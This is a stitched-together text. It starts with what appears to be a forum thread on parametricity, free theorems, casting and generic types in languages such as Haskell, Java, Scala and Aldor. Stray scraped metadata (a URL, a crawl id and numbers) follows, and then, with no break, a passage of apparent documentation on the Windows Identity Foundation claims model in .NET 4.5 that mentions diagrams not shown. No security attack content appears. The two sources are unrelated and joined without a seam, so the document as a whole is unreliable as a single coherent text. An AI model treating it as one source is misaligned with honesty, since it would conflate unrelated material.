I'm just defending my speculation that you can get free theorems in the same spirit as "Theorems for Free!" even if parameterization in your language isn't completely "free". The speculation is that, heuristically, instead of interpreting a type like List<T> as something akin to (forall a. List a), you interpret it as something like (forall a. Castable a => List a). I mentioned at the outset that resulting free theorems would probably be weak to the point of useless. Maybe such things shouldn't be called "parametricity", but it's in the same vein.
Thanks for the link, btw. I've only read part of it, but so far it's interesting.
While I understand your argument, I favor Andreas's underlying position that we shouldn't undermine the meaning of our words by allowing them to apply vacuously or when they fail to make a useful distinction. When someone says 'parametric', I expect them to mean it in some useful manner, lest we discuss the pinkness of invisible unicorns.
In that same vein, 'type safety' and 'type inference' shouldn't be used for systems that have only one type, and 'capability model' shouldn't be applied to pure functional expressions that forbid communication effects.
The resulting theorems would no doubt be complex, weak, and practically useless, but they would not be strictly trivial. I don't disagree that 'parametricity theorem' is a bad name for this.
I suspect I'll need to see a non-trivial theorem before I'll agree they exist.
You used 'forall a.Castable a => List a'. It is unclear what, precisely, 'Castable' means to you. (How does it relate to Haskell's "Dynamic" or "Typeable" classes?)
forall a.Castable a => List a
But I assume your qualifying use of the intentionally vague phrases "something akin to" and "something like" means I am to substitute 'Castable' with whatever kin come to mind.
Reflective programming comes to mind. So let's use that: forall a. Reflective a => List a, where 'Reflective a' at its limit would mean access to arbitrary properties of the type, the specific values, and potentially even the version-history of the type and the origin of those values (fexpr-like access to context (lexical and dynamic environment), expression (operands and operands' operands), reflective stacks).
forall a. Reflective a => List a
If you do not feel I am too broadly interpreting the momentary hand-waving you included in your earlier post, then of which non-trivial parametricity theorems do you speak that will apply to Castable and its various kin?
If every operation is possible on every parameter, you don't get any nontrivial theorems. So with a strong enough reflection, you'd necessarily have no free theorems. If you're only allowed casts, it looks like you could say something about how a function behaves with respect to fresh types. Does that count? :)
Without casting there's only one value with type forall a.List a, []. With cast :: forall a b : a -> Maybe b I can create all kinds of values
helloWorldOrNil :: forall a. List a
helloWorldOrNil = fromMaybe [] $ cast "hello world!"
What theorems does that leave me with?
But parametricity is easy if the only type is Univ. You just don't get any theorems...
Yeah, making cast total gives you "forall a b.a -> Maybe b" which is some seriously weak tea.
If you have parametric type constraints and a subtype relation <: you can do a little better:
forall A B | B <: A. A -> Maybe B
Of course then the subtype relation must cover type parameters as well, or you get into further binds down the road.
Once your language has a top type (like, for most purposes, Object in Java), that type is as general.
From that you can build
forall a b exists t | a <: t ^ b <: t . a -> Maybe b
And, as Andreas says, a top type trivially satisfies the existence of t.
BTW, is the List class in this example the List imported from Java, or part of the Scala libraries?
Java inching toward Scala?
Nice to see this becoming mainstream. Aldor (then called A#) does something very similar (see).
This is particularly useful in a mathematical setting for writing generic packages that apply isomorphisms, e.g. transpose(C1, C2)(R) converting C1(C2(R)) values to C2(C1(R)) values. So transpose(Complex, Polynomial(x))(Integer) would convert Complex Polynomial(x) Integer to Polynomial(x) Complex Integer, that is complex values with polynomial real and imaginary parts to polynomials with complex coefficients. Parameterized differently, the same constructor would convert matrices of quaternions to quaternions of matrices, etc.
transpose(C1, C2)(R)
C1(C2(R))
C2(C1(R))
transpose(Complex, Polynomial(x))(Integer)
Complex Polynomial(x) Integer
Polynomial(x) Complex Integer
A simplified example for data structures is given in the Aldor User Guide (page 222).
|
http://lambda-the-ultimate.org/node/3961
|
CC-MAIN-2018-05
|
refinedweb
| 3,146
| 54.22
|
coding? Module? Tutorials? (Newbie)
-I haven't recieved my Lopy yet but I want try the codes on the doc section.
Is that possible?
-I tried to import the network module but can't access it online. where can I get that? (Even to simply read and not make it work)
-Are there any tutorials you'd recommend to help getting started with pycom
Hi,
You can find a series of code tutorials for pycom modules on our documentation website (), we also provide code examples on our github (). While micropython is very similar to regular python, there are libraries that are specific to our devices. I have noticed you have asked in several place on the forum where the "network" module comes from. This is not a regular python module that you can install on your desktop, but rather a module implemented in c by our firmware (). Due to the fact that some modules are only present on our firmware, there will be a lot of examples you cannot run on your desktop. On the other hand, most python you write on your desktop will run on pycom modules, micropython only has a few limitations compared to full python ().
@hajermet said in coding? Module? Tutorials? (Newbie):
@livius
Thanks for your reply but then I only did python before (so this may seem dumb) but can't I like download a .py file to read? (I want to understand what it basically is)
I don't think that reading examples will help for the basic understanding.
You will find the examples on gitub
The *Pys are basicly ESP32 microcontrolers which have WiFi and Bluetooth on board. Depending on the * they have additional radio systems. They run a port of micropython. The additional radio systems are the trick of the *Py. With them you can communicate with sensors and actors outside of your WiFi range. The * radio system will transport only small messages but with a much larger range than unpimped WiFi. Some of them use gateways to the internet too increase the range.
It seems that pycom builds an ecosytem on top of these basic functionality, so you can buy expansion boards and sensors from them, which have easy to use libraries for micropython.
but can't I like download a .py file to read?
What you tried download but you cannot? Please describe this more clearly.
@livius
Thanks for your reply but then I only did python before (so this may seem dumb) but can't I like download a .py file to read? (I want to understand what it basically is)
I tried to import the network module but can't access it online
import where if you have not module yet?
but examples you can find in official docs
or
and some with modification should work from normal python but some not.
This is
micropythonnot full
python.
and you have many examples of user code on the forum.
|
https://forum.pycom.io/topic/2604/coding-module-tutorials-newbie
|
CC-MAIN-2018-22
|
refinedweb
| 490
| 73.07
|
.
Recommended to add (For Xcode users (macos). Something like:
"On Xcode, you must add breakpoints before you debug. You click on the number next to the line to do that. Then, you Run (cmd + R) the program and not do any other build types, as they ignore breakpoints. This also executes the code as a program, so it will output any code that you have in it. (Ex. if you don't put a breakpoint before
it will write "Hi!" in the terminal.)"
Absolutely brilliant. I can see I'm going to be making a lot of use of this!
#define max 10
int main()
{
char a[max];
int total=1;
char ch;
for(int i=0;i
{
cin>>a[i];
total=total*a[i];
cout<<”Do you want to add?\n”;
cin>>ch;
if(ch==’n’)
break;
}
for(int i=0;i
cout<
cout<
return 0;
}
solve error
Hi Karna!
Please use code tags, your code is incomplete.
What's the error message you're getting?
Don't use 'using namespace'.
Prefer constexpr over macros.
Q..For this code snippet, identify the conditions under which errors occur/code fails to act as expected.
#define max 10
int main()
{
char a[max];
int total=1;
char ch;
for(int i=0;i
{
cin>>a[i];
total=total*a[i];
cout<<”Do you want to add?\n”;
cin>>ch;
if(ch==’n’)
break;
}
for(int i=0;i
cout<
cout<
return 0;
}
please solve this
Hi! For some reason when I choose 'Step into' while I am on
it never goes into the function, it just prints the value into the console and then goes to
. I understand everything you wrote I just wonder if there is a reason for this?
Thank you!
Edit: I tried it a few more times and then it just worked, weird.. Thank either way! :)
please sove this fast sir
Dear Teacher, please let me the question: In "Conclusion" you say: "Congratulations, you now know all of the major ways to make the debugger move through your code". How do you know that I know all that? Regards.
Well, you have at least been exposed to it. Whether you retained it or not is a personal issue. :)
Hello Alex, nascardriver
I am having an issue with debugging.
For fun I made my main program run on a do/while loop to run a menu to be able to run all programs I have written so far.
Now as I attempt to debug on of the programs which lives in its own file, I am constantly taken to main, and when I attempt to run
the buggy program it will not let me into the file to run it statement by statement to find where I am having my issue.
I have tried the step in, step out and step over but it will not let me get past the loop in main. should I temporarily terminate the loop to debug?
Also if you do not mind, I would like to go ahead and ask you what I did wrong with this code that causes windows to terminate my program. It is an attempt to dynamically allocate a string array to enter in a string. It looks right and compiles fine without issue, but when it is called it will initiate with the cin call but it terminates with a windows error before I can proceed.
That should be everything you need to run it.
Thank you for your help.
Hi Joe!
I can't help you with your debugger problem. Which IDE are you using?
@sizeof doesn't return the length of a string. It returns the size of the specified data type/variable. You need
Line 15: @string is of length @value6 so there is no index at @value6. You need
or
Your variables have bad names.
Thank you nascardriver,
I attempted again to run the code but it is still causing an error and being shutdown by windows.
I am using visual studios 2017.
I commented out line 15 and the for each loop and instead ran a regular for loop to cout the elements.
An update while I was writing. It seems there was still input in the buffer. So that caused the crashing. I added to my
getLine() function a cin.ignore to clear the buffer and it is running now.
I am still having an issue with why my input is not being assigned to my array. But at the least it has stopped
crashing.
Mind sharing your new code? Unless you want to figure it out on your own.
where is the continue command in visual studio 2017 while debugging ?
Hi varad!
Green play button at the top with "Continue" next to it.
I would just like to take this moment to thank you Alex and all the other helpful on this website for helping not just me but everyone learn how to code.
You're welcome. Thanks for visiting!
Dear Teacher, please let me ask your help. I tried debugging with Code::Blocks 17.12 but failed. Problem is Settings > Debugger > Common > GDB/CDB debugger. I created path for gdb.exe and deleted Default according to an answer at Stack Overflow. Eventually after clicking Debug > Step into, a wxWidgets appears saying: Unknown option 'nx'. Thanks in advance. Regards.
Hey Georges,
I'm unable to assist you with this, as this appears to be a Code::Blocks specific configuration issue. Your best bet is to use Google search to see if you can find someone who has had the same problem.
Dear Teacher, please accept my many thanks for you replied and for your assistive answer. I did that with words "code blocks option 'nx'", and from resauts I chose "Images for code blocks option 'nx'". Then first image > click on image > > 2.1 Installation > I followed instructions. Indeed in Debugger settings I configured "Default" (without quotes) and deleted gdb.exe I had added according to Stack Overflow suggestion. If you do not configure gdb.exe, default setting is Default. Eventually everything is okay. Regards.
Glad to hear you were able to resolve it.
The step into and step over is different, but not as it is described in this text. Step over can still execute the statement in the function.
> Like "Step into", The Step over command executes the next line of code. If this line is a function call, "Step over" executes all the code in the function...
Seems pretty clear to me that step over executes the statements in the function. What am I missing?
Hi Alex,
When I tried to execute the step in command, I received the following error:
ERROR: You need to specify a debugger program in the debuggers's settings.
(For MinGW compilers, it's 'gdb.exe' (without the quotes))
(For MSVC compilers, it's 'cdb.exe' (without the quotes))
How do I specify a debugger program?
Thanks
Not sure, as this is a code::blocks specific issue. Try some of the suggestions here:
I got answer for it. Just click on Settings --> Debugger --> Common --> GDB/CDB Debugger --> Default.
Then click on executable path to find the address to gdb32.exe
Then locate where your codeblock is installed. Then follow given path
CodeBlock --> MinGW --> bin --> gdb32.exe (locate it and double click on it).
Then press ok and you are good to go.
Great. It works.
thanks
Your wlc Noam
Hey Alex,
When I'm using step into, it will step through my program, but when it comes back out to main() and is running the "std::cout << "The sum of 3 and 4 is " << add(3, 4) << std::endl;" line, it will jump through all of these library files without outputting that code in the console window that opens up. For example, it will step through functions in "ostream", "iosfwd", "xiosbase", and a bunch of other files before it tries to read a file that is non-existent and errors out. None of this happens when I run my code normally.
Any thoughts on why this is happening?
Thanks,
Michael
That code is the code that implements std::cout and the << operator. As soon as you enter a standard library function, you should step out to return back to the caller.
Sir, what is the difference in function between "Run to Cursor" and "Breakpoint". They both seem to serve the same purpose of running up to a particular line of code after which we want to look carefully.
The two functions are similar. Breakpointing code will always cause the debugger to stop on that line (stopping there multiple times if relevant). Run to cursor causes the debugger to run until the current line is encountered. It's like using a temporary breakpoint on the currently line. Run to cursor is really a convenience command.
My dear Teacher,
Please let me ask you add a paragraph about breakpoints with code blocks, because with them breakpoints behave different than with visual studio.
With regards and friendship
My dear Teacher,
Please let me say breakpoint behave in code blocks as in v.s. but I have confused it with bookmarks I do not see in your tutorial.
With regards and friendship
My dear c++ Teacher,
Please let me say I can not understand "Choose “Step over” this time (this will execute this statement without stepping into the code for operator <<)."
How is that statement "std::cout << nValue;" be executed without operator "<<" be executed?
With regards and friendship
Georges Theodosiou
Operator<< is executed, the debugger just won't step you through the code for operator<< line by line.
plz help me to debud a program in code block
man plz help me !
When I use step into or use any of the debugging feature in code blocks 16.01 IDE, no console output window appears just a message comes in the log window that debugging finished with status 1.
ALEX, Plz Help Me Man.
Did you switch to a debug build target and do a full recompile?
I spotted the error myself and fixed it....thanks Anyway Man !
My dear c++ Teacher,
Please let me a suggestion:
In "Step into" section after "Visual Studio does not, so if you’re using Visual Studio, choose “Stop Debugging” from the debug menu. This will terminate your debugging session."
add: "if you continue click "step into", another .cpp file will open and yellow arrow will indicate some line in it. You must close this file and click “Stop Debugging”".
Also in the "Run" section you say:
"If you have been following along with the examples, you should now be inside the printValue() function. Choose the run command, and your program will finish executing and then terminate."
But visual studio has not "run" command. "Continue" command (in Debug menu) and "Run To Cursor" in menu after right click with mouse pointer on a line do this job. Problem is that console window (the black one) disappears quickly and you can not see number 5.
With regards and friendship.
Note to Visual Studio 2017 users: The "run to cursor" function doesn't exist in the debug menu, but a green button pops upp to the left of a line when you highlight it during debuging
My dear c++ teacher,
Please let me send you my last comment for today.
1. In templates you have "PrintValue(int nValue)", capital first letter.
2. Between 2nd and 3rd templates and below 3rd you state "is the call to printValue()" and "the printValue() code", and "opening brace of printValue()". My understading is that you mean: function definition "void printValue(int nValue)", and that "printValue()" is function call.
Bonne journée.
With regards and friendship.
My dear c++ Teacher,
Please let me say you that in text between 2nd and 3rd template you state: "Because printValue() WAS a function call, we “Step into” the function ...". According to my bad english it means: "printValue() is NOT any more function call".
With regards and friendship.
"was" updated to "is", as it still is a function call. Thanks!
My dear c++ Teacher,
Please let me again ask your help for always you help your last disciple Georges Theodosiou.
How can I do "step into" with Dev c++ 5.11?
With regards and friendship.
I am not familiar with dev c++ 5.11 so I am unable to advise you on this. I am unsure if it applies to version 5.11, but the following document may be helpful:.
My dear c++ Teacher,
Please let me express my gratitude for you replied my comment (my dear dsp Teacher Mr. Richard Lyons snobs me, he teaches me only by his book) and for suggested me a good document. It applies to version 5.11 but with some differences in names. For example instead of "next step" this version has "next line". Anyway it is helpful.
With regards and friendship.
My dear c++ Teacher,
Please let me say that as it is clear from the document you suggested me, debugging with Dev-C++ 5.11 is different than with Visual Studio.
Before clicking "Next line" (step into) I have to check (by clicking) breakpoint. When I click (set breakpoint) on line 1 (#include <iostream>) and then click "Debug", arrow (blue) appears on line 5 (std::cout << nValue;). When next I click "Next line", console window outputs "5", and arrow goes to line 6. When I click again "Next line" arrows goes to line 11 "return 0;" and after one more click on "Next line" it goes to line 12, end of program.
Now if I close file main.cpp and open it again, and set breakpoint on line 8 (int main()), and click "Debug", arrows goes to line 10 (printValue(5);). If then click on "Next line" console window outputs "5", and arrows goes to line 11, and after one more click on "Next line" it goes to line 12.
So, arrow never goes from function call: printValue(5) to function definition: void printValue(int nValue).
With regards and friendship.
My dear c++ Teacher,
Please let me ask you in sentence "step into enters ..." type "step into" with bold letters so your non American disciples easy understand it is subject of the verb "enters".
With regards and friendship.
I've quoted "step into" in this case, to make it easier to read. Thanks for pointing that out.
My dear c++ Teacher,
Please let me say you what two compilers output for first program, number divided by zero. Compiler
D-C++ 5.11 throws template: "Project1.exe a cessé foctionner" that is: "Project1.exe does not function any more". Compiler outputs: "Floating point exception (core dumped)".
With regards and friendship.
I'm using Code Blocks 16.01 on Ubuntu 16.04 and I cannot get the 5 to print in the debugging window. By default Code Blocks launches xterm but stepping into and moving to next line does not display any value in the xterm console as shown:
Some forum posts on the Code Blocks forum and other places suggest changing some settings. For example, changing from xterm to gnome-terminal. However I have the exact same results:
I initially thought it was related to the message I see "warning: GDB: Failed to set controlling terminal: Operation not permitted", but multiple threads on the Code Blocks forums imply that this is a cosmetic issue and should have no effect on debugging functionality.
I have installed Code Blocks on a machine running Windows 10 and I am able to see the "5" value in the debugging window. This seems to be unique to either the the configuration of Ubuntu or of Code Blocks on this machine, however there is nothing I know of that has been modified.
Could someone please assist me with fixing this issue?
Thanks in advance,
Ian
I was able to resolve this issue by using std::endl
If you are having trouble getting the debugger window to show anything on linux, I would check if the following works:
My dear c++ Teacher,
Please let me say some problems I got using Code::Blocks 16.01.
1st: When first I choose "step into", yellow arrow appears not to the left of the opening brace of main(), but of the printValue(5);.
2nd: When for second time I choose "step into", yellow arrow appears not to the left of the opening brace of printValue(int nValue), but of the std::cout << nValue;.
Also let me following question:
You state: "Choose “Step over” this time (this will execute this statement without stepping into the code for operator <<). Because the cout statement has now been executed, you should see that the value 5 appears in the output window."
Yes, value 5 appears in the output window, but how "step over" executes this statement without stepping into the code for operator <<? My understanding is that this operator is including in this statement, then if operator is ignored, statement should not be executed.
With regards and friendship.
I wrote the article using Visual Studio 2015 -- some other debuggers might do things slightly differently. So your first and second point are fine.
Regarding your third point, step over does not ignore the statement -- it executes the statement without stepping into any functions, allowing you to skip past function calls you're not interested in debugging.
My dear c++ Teacher,
Please let me suspect that I have to follow your way: discover compiler's features by trial and error. Do you suggest me that?
I wish you happy new year and every year to come, and live many years for teach me c++!
With regards and friendship.
Yes, you should not be afraid to learn by experimentation.
Alex:
Using Visual Studio 2015. Debugged printValue sketch and everything in tutorial went according
to plan up to the point of entering "Step out".After that a new screen with over 200 lines
of code popped up. My original screen was titled ConsoleApplication7.cpp . The new one was simply called
Miscellaneous. The cursor was at line 64 in this program. After fumbling around a bit I found that if I
repeatedly clicked "Step into" the cursor walked down the page and eventually ConsoleApplication7 came
back. The figure 5 did appear in the console output window after "Step out" was applied. After restoring
the ConsoleApplication7 screen with "Step into" clicks the output screen was blank. Is there an easy
answer?
Garry E
Could have been something from the C++ standard library. Sometimes the debugger will pop into there and walk through all kinds of crazy obtuse code before returning back to your code. When that happens, an additional step out normally returns you to your code.
For xCode 7 Users:
My debug menu in xCode 7 was greyed out, this YouTube tutorial was a good explanation:
Hi i still do not understand how 5 - 3 = 2, how come it is 8 as you said above?
The function is named add(), so clearly the intent is to add the numbers, not subtract them. The add() function has a typo where the minus operator is being used instead of the plus operator, so the result of add(5,3) is 2 instead of the expected 8.
Name (required)
Website
|
https://www.learncpp.com/cpp-tutorial/using-an-integrated-debugger-stepping/comment-page-2/
|
CC-MAIN-2019-13
|
refinedweb
| 3,204
| 74.19
|
[Apologies for not filing this sooner. I thought I had filed it, but it seems not. I've been sat on this for too long. Since this affects all browsers equally, I was going to just discuss it on my blog and let the web community figure out the best way to address this. However, I thought it would be polite to offer WebKit / Safari a chance to fix it first].
The attack involves cross-domain CSS stylesheet loading. Because the CSS
parser is very lax, it will skip over any amount of preceding and following
junk, in its quest to find a valid selector. Here is an example of a valid
selector:
body { background-image: url(''); }
If a construct like this can be forced to appear anywhere in a cross-domain document, then cross-domain theft may be possible. The attacker can introduce this construct into a page by injecting two strings:
1) {}body{background-image:url('
(Note that the seemingly redundant {} is to resync
the CSS parser to make sure the evil descriptor parses properly. Further note that having the url start like a valid url is required to steal the text in some browsers).
2) ');}
Any anything between those two strings will then be cross-domain stealable! The data is stolen cross domain with e.g.
window.getComputedStyle(body_element, null).getPropertyValue('background-image');
(This works in most browsers; for IE, you use ele.currentStyle.backgroundImage)
There are a surprising number of places in internet sites where an attacker
can do this. It can apply to HTML, XML, JSON, XHTML, etc.
At this point, an example is probably useful. To set up for this example, you need:
a) Get a Yahoo! Mail account.
b) Make sure you are logged into it.
c) E-mail the target victim Yahoo! account with the subject
');}
d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate one).
e) E-mail the target victim Yahoo! account with the subject
{}body{background-image:url('
f) Send victim to theft page
g) The stolen text shown is achieved via cross-domain CSS theft.
Other good examples I've had success with are social networking sites, where the attacker gets to leave arbitrary-text comments which are rendered on the victim's trusted page.
The main common construct that prevents exploitation is newlines.
Obviously, newlines cannot be considered a defense! Escaping or encoding of quote characters can also interfere with exploitation. One useful trick: if ' is escaped, use " to enclose the CSS string.
Part 2 (on possible solutions) to follow.
<rdar://problem/7258451>
Possible solutions.
First, there are some solutions it is easy to reject:
1) Restrict read of CSS text if it came from a different domain.
This is a useful defense that I filed a while ago in a different bug. But it
will not help in this case. The attacker can simply use as a prefix for the background-image value, and wait
for the HTTP GET to arrive which includes the stolen text in the payload.
2) Do not send cookies for cross-domain CSS loads.
This probably breaks a load of sites? It is certainly a riskier approach. I
have not dared try it!
The solution that I'm playing with is as follows:
- Activate "strict MIME type required" in the event that the CSS was loaded
(via link tag or @import) as a cross-domain resource.
- Also, crash hard if a CSS load fails due to strict MIME type test failure.
I've been running my build locally with these changes for a few days and there
seems to be some merit in this approach, i.e. my browser hasn't crashed apart
from when I hit my attack URLs..
Here's the patch I'm running with. Including 3rd chunk which crashes on mismatched MIME type when strict mode is on... (note -- not adding as an attachment because it most certainly is not a proposed patch :P )
Index: html/HTMLLinkElement.cpp
===================================================================
--- html/HTMLLinkElement.cpp (revision 48734)
+++ html/HTMLLinkElement.cpp (working copy)
@@ -252,6 +252,12 @@
if (enforceMIMEType && document()->page() && !document()->page()->settings()->enforceCSSMIMETypeInStrictMode())
enforceMIMEType = false;
+ // If we're loading a stylesheet cross-domain, always enforce a stricter
+ // MIME type check. This prevents an attacker playing games by injecting
+ // CSS strings into HTML, XML, JSON, etc. etc.
+ if (!document()->securityOrigin()->canRequest(KURL(ParsedURLString, url)))
+ enforceMIMEType = true;
+
m_sheet->parseString(sheet->sheetText(enforceMIMEType), strictParsing);
m_sheet->setTitle(title());
Index: css/CSSImportRule.cpp
===================================================================
--- css/CSSImportRule.cpp (revision 48734)
+++ css/CSSImportRule.cpp (working copy)
@@ -26,6 +26,7 @@
#include "DocLoader.h"
#include "Document.h"
#include "MediaList.h"
+#include "SecurityOrigin.h"
#include "Settings.h"
#include <wtf/StdLibExtras.h>
@@ -62,7 +63,10 @@
CSSStyleSheet* parent = parentStyleSheet();
bool strict = !parent || parent->useStrictParsing();
- String sheetText = sheet->sheetText(strict);
+ bool enforceMIMEType = strict;
+ if (!parent || !parent->doc() || !parent->doc()->securityOrigin()->canRequest(KURL(ParsedURLString, url)))
+ enforceMIMEType = true;
+ String sheetText = sheet->sheetText(enforceMIMEType);
m_styleSheet->parseString(sheetText, strict);
if (strict && parent && parent->doc() && parent->doc()->settings() && parent->doc()->settings()->needsSiteSpecificQuirks()) {
Index: loader/CachedCSSStyleSheet.cpp
===================================================================
--- loader/CachedCSSStyleSheet.cpp (revision 48734)
+++ loader/CachedCSSStyleSheet.cpp (working copy)
@@ -138,7 +138,9 @@
// This code defaults to allowing the stylesheet for non-HTTP protocols so
// folks can use standards mode for local HTML documents.
String mimeType = extractMIMETypeFromMediaType(response().httpHeaderField("Content-Type"));
- return mimeType.isEmpty() || equalIgnoringCase(mimeType, "text/css") || equalIgnoringCase(mimeType, "application/x-unknown-content-type");
+ if (!(mimeType.isEmpty() || equalIgnoringCase(mimeType, "text/css") || equalIgnoringCase(mimeType, "application/x-unknown-content-type")))
+ *((char*)NULL) = '\0';
+ return true;
}
}
(In reply to comment #2)
>
>
>.
We could experiment with doing that, but the risk may be somewhat high. The security benefit could be worth it however.
Note that any experimental WebKit change would get an automatic workout in the Chrome dev channel builds fairly quickly ;-)
(In reply to comment #5)
> Note that any experimental WebKit change would get an automatic workout in the
> Chrome dev channel builds fairly quickly ;-)
This is a good opportunity to use UMA to see which of these mitigations are feasible w.r.t. compatibility.
This is something I continue to fail to have time to look at -- hence the filing of the bug upstream :-/
Yeah, I got a good patch which is both conservatively secure and conservatively compatible. Compatibility has been checked with a run across 500,000 URLs, and in fact the solution was derived from these URLs. I'll upload the patch once I have a good test too :)
Patch to follow, I think it's good. I've done a lot of testing including:
- Full LayoutTests (clean)
- Mining of 500,000 URLs for interesting cross-domain CSS usage. Best I know, the only site affected by this is which looks slightly different but is still acceptable and usable. Regrettably, this pages uses text/html for a cross-domain CSS load and prefixes valid CSS with "<style>".
- Turns out that cross-domain text/html with a valid CSS payload, and text/plain with a valid CSS payload does occur (28 occurrences in 500,000 URLs including curiously configure.dell.com)! Therefore this case is accounted for.
- Other common MIME types mistakenly used for cross-domain CSS loads include application/octet-stream (53 / 500,000), application/css (1), application/x-pointplus (1)
Created attachment 42540 [details]
Patch and test
Nice idea Chris. I'm going to let an expert in this area review the actual code, but I like the approach.
Have you shared the approach with the other browser vendors? It would be best if we all did the same thing.
This looks like a promising approach (have not reviewed the CSS parser details yet).
I'm sorry to bring these to the table late, but here are some other ideas I thought of:
1) For cross-site stylesheet loads, disable Cookies, HTTP Auth, and sending of client-side certs (or perhaps any SSL). Then the only risk is to content that is only protected by a firewall. I'm not sure if this would break anything, but it would depend less on the details of the CSS parser so it may be more robust..
Any thoughts on these?
>.
>
If I am not mistaken, I believe we now always disallow scripting access to cross-site stylesheets. (see).
I am cc'ing hyatt, who would probably be the best person the review the change to the CSS parser.
Comment on attachment 42540 [details]
Patch and test
Not a full review, just some passing comments
- I think we should be using the term crossOrigin instead of crossDomain since we are really talking about the origin tuple, not just the domain.
- I am not a fan of the term "good" in the context you are using it. What is a "good" header? What is a "good" CSS rule? Please be more explicit with those names.
- Is this something we should add a Setting for while it is still experimental?
> +void
> +CSSParser::invalidBlockHit() {
Two nits. The "void" should be on the same line as the rest of the function prototype. The { should be on the next line.
@Sam, comment #13: unfortunately, the referenced change does not prevent script access. It simply stops raw CSS rule text access via the "cssRules" array (bringing WebKit in line with all other browsers). It leaves the getComputedStyle().getPropertyValue() avenue open. And even if we closed that, it's still not good enough, see next comment...
@Sam, comment #14: thanks. I'll use "syntacticallyValid" instead of "good".
.
Hyatt, any thoughts?
(In reply to comment #16)
> .
Good point. I withdraw the idea.
>.
I heard recently that IE no longer sends Cookie headers for cross-site <script> loads, which is what made me think of the idea for styles. I think we should consider #1 if it turns out to be sufficiently compatible, perhaps in combination with your change.
I will try to get someone with CSS parser knowledge to look at your patch.
Where did you hear that IE doesn't sent cookies for cross-site <script> loads? Maybe you're thinking of Gazelle?
I spoke with Charlie Reis recently and we talked about just this. A lot of sites unfortunately depend on it. was the example given. I've not checked myself, but Charlie is pretty reliable.
The reason I prefer the "stricter CSS" approach is that sites are welcome to depend on cookies being sent for cross-origin CSS, and it's not an unreasonable thing to do. On the other hand, it's not reasonable for sites to load cross-origin CSS with bust-up MIME types with a CSS syntax error preceeding valid CSS.
However, I would of course be delighted if we could just not send cookies for cross-site script, CSS etc. I just think it'll break stuff. May be worth an experiment in the future...
Comment on attachment 42540 [details]
Patch and test
You need to patch XML processing instructions also, and there needs to be a test for those.
I agree the need to test XML processing instructions. I'll get on that.
However, I don't think a code change is needed because "strict" mode is enforced, which requires a valid CSS MIME type. This is certainly subtle -- strict mode is used because of a defaulted C++ parameter, so I'll add a comment.
Created attachment 43007 [details]
Address all comments from review
New patch updated, featuring:
- Fixes Sam's naming and style comments.
- Adds a test for the CSS in XML case noted by Dave.
- Adds a comment and makes the "strict" mode of CSS in XML more explicit.
- Tweaks one of the tests to check that a semantically invalid descriptor (i.e. contains unknown property) loads OK.
- Better ChangeLog entry.
Ping? I'm now away until Tuesday, and then limited availability for Tues & Weds prior to three weeks away. I'd rather not lose this small window for landing this.
Comment on attachment 43007 [details]
Address all comments from review
The CSSParser changes seems iffy to me. Why limit to just a "header" check? What if you hit an invalid block first and then hit some valid rules following the invalid block?
What is the point of the extra enforceMIMEType argument to parseString? It looks like it matches whether or not you're using strictParsing always, so I don't get the point of it.
That previous comment about enforceMIMEType may not have been totally clear. I'm specifically wondering about CSSImportRule. It looks like enforceMIMEType is never being checked against the setting:
HTMLLinkElement has the following code:
if (enforceMIMEType && document()->page() && !document()->page()->settings()->enforceCSSMIMETypeInStrictMode())
enforceMIMEType = false;
This check was really only necessary for iWeb, and we didn't bother pushing it into import rules. You added the enforceMIMEType variable to the CSSImportRule check but then didn't bother doing anything with it, so it just matches strictParsing.
I don't see a need for that check in sub-stylesheets, so please just get rid of enforceMIMEType in CSSImportRule.
Thanks for taking a detailed look, Dave.
@25: "The CSSParser changes seems iffy to me. Why limit to just a "header" check?
What if you hit an invalid block first and then hit some valid rules following
the invalid block?"
The attacker, unfortunately, can easily inject some valid rules after some preceding junk. So in that case (invalid block then valid rules), we must reject.
.
Any thoughts re: my comment #27?
If there are still concerns, perhaps we should schedule lunch @ Apple to finally land this thing? I'm currently on vacation but Weds 9th Dec would work. I don't want to delay some form of landed solution too close to the Dec 28th deadline.
@26: I've now had the time to have a more thorough look. I believe the only logic change I made is to add the cross-domain check.
Perhaps the confusion is the rename of "strict" to the more descriptive "enforceMIMEType". So, "enforceMIMEType" is definitely used -- and used with the exact same logic as before the patch.
"(In reply to comment #27)
>
> .
Except you haven't made it clearer. That variable name is wrong in that context, and the change is unnecessary. Look at HTMLLinkElement:
m_sheet->parseString(sheetText, strictParsing);
Now look at what you did in CSSImportRule:
m_styleSheet->parseString(sheetText, enforceMIMEType);
The argument to parseString is whether or not CSS Is using strict parsing. It's not just about MIME type enforcement. You just didn't need to introduce that variable name here, since that variable was only introduced as a local in the other spot so that it could be set to false if the setting was present.
Thanks, Dave. I see and agree with the concern now.
I fixed it, but ironically, I discovered upon "svn update" that r52032 actually introduces a split of "strict" vs. "enforeMIMEType" to the CSS import code. I'm doing a manual merge now and will post an updated patch shortly.
Created attachment 44830 [details]
Latest patch -- merge with WebKit head
Ok, updated patch attached.
Note that "enforceMIMEType" was introduced by (completely unrelated) r52032. This makes the latest patch smaller, and sort of cancels the clarified complaint in comment #30 :)
Any further changes you would like?
Friendly ping? :)
Now public, via Mozilla checkin and my blog.
Unless there are further comments on the patch, can we get this landed?
Comment on attachment 44830 [details]
Latest patch -- merge with WebKit head
Chris appears to have addressed hyatt's concerns. This security issue is public now and needs to get fixed as soon as possible. The discussion on this bug seems to have stalled.
As far as I can tell, the patch seems fine. Marking as review+. If you have concerns, let me know. If we need to iterate on this after landing, we can do that too.
Committed r52784: <>
Un-hiding; all very public by now and I want to fix the link from
|
https://bugs.webkit.org/show_bug.cgi?format=multiple&id=29820
|
CC-MAIN-2019-30
|
refinedweb
| 2,636
| 66.33
|
WIF Claims Programming Model
ASP.NET and Windows Communication Foundation (WCF) developers ordinarily use the IIdentity and IPrincipal interfaces to work with the user’s identity information. In .NET 4.5, Windows Identity Foundation (WIF) has been integrated such that claims are now always present for any principal as illustrated in the following diagram:
In .NET 4.5, System.Security.Claims contains the new ClaimsPrincipal and ClaimsIdentity classes (see diagram above). All principals in .NET now derive from ClaimsPrincipal. All built-in identity classes, like FormsIdentity for ASP.NET and WindowsIdentity now derive from ClaimsIdentity. Similarly, all built-in principal classes like GenericPrincipal and WindowsPrincipal derive from ClaimsPrincipal.
A claim is represented by Claim class. This class has the following important properties:
Type represents the type of claim and is typically a URI. For example, the e-mail address claim is represented as.
Value contains the value of the claim and is represented as a string. For example, the e-mail address can be represented as “someone@contoso.com”.
